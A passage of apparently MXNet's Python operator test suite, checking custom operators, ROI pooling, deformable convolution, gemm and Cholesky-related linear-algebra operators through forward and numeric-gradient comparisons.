self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of the default
# implementation of storage type inference in custom operators
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork on Windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
# test exception handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
assert_raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger an error via incompatible operand shapes
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
assert_raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# the input to Cholesky factorization must be
# symmetric positive-definite; the error is
# triggered during op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
assert_raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# the input to Cholesky factorization must be
# symmetric positive-definite; the error is
# triggered during op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
assert_raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = int(image_height * spatial_scale)
feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# Only a GPU implementation exists for now
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condition holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
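def _demo_roi_bin_geometry():
    # Illustrative sketch, not part of the test suite: the ROI-to-feature-map
    # bin arithmetic used in _validate_sample_location, on made-up numbers.
    spatial_scale, pooled_w, pooled_h, sample_per_part = 0.0625, 2, 2, 4
    x0, y0, x1, y1 = 16., 32., 111., 95.  # hypothetical ROI in image coords
    roi_start_w = round(x0) * spatial_scale - 0.5        # 0.5
    roi_start_h = round(y0) * spatial_scale - 0.5        # 1.5
    roi_end_w = round(x1 + 1) * spatial_scale - 0.5      # 6.5
    roi_end_h = round(y1 + 1) * spatial_scale - 0.5      # 5.5
    roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h  # 6.0, 4.0
    bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h      # 3.0, 2.0
    # each pooling bin is sampled on a sample_per_part x sample_per_part grid
    return bin_size_w / sample_per_part, bin_size_h / sample_per_part  # 0.75, 0.5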
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = int(image_height * spatial_scale)
feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points the bilinear interpolation function may be non-differentiable;
# to avoid this, we check that the sampling locations land on valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# Only a GPU implementation exists for now
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check different settings of the axis that indexes the matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
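def _demo_gemm_semantics():
    # Illustrative sketch, not part of the test suite: the contract the
    # checks above rely on, namely out = alpha * dot(A, B) + beta * C.
    a = np.random.uniform(1, 10, (2, 3))
    b = np.random.uniform(1, 10, (3, 2))
    c = np.random.uniform(1, 10, (2, 2))
    ref = 4. * np.dot(a, b) + 7. * c
    out = mx.nd.linalg.gemm(mx.nd.array(a), mx.nd.array(b), mx.nd.array(c),
                            alpha=4., beta=7.)
    assert_almost_equal(out.asnumpy(), ref, rtol=1e-5, atol=1e-6)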
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
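def _demo_triangle_mask(m=4):
    # Illustrative NumPy sketch, not part of the test suite, of the mask that
    # _make_triangle_symm builds: start from the identity and stack shifted
    # one-hot rows until row j has ones in columns 0..j (lower triangle).
    mask = np.eye(m)
    for j in range(1, m):
        part1 = np.zeros((j, m))
        part2 = np.eye(m)[:m - j]  # one-hot rows 0 .. m-j-1
        mask = mask + np.concatenate([part1, part2], axis=0)
    assert np.array_equal(mask, np.tril(np.ones((m, m))))
    return mask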
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow_mat = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: the input has to be symmetrized for the gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
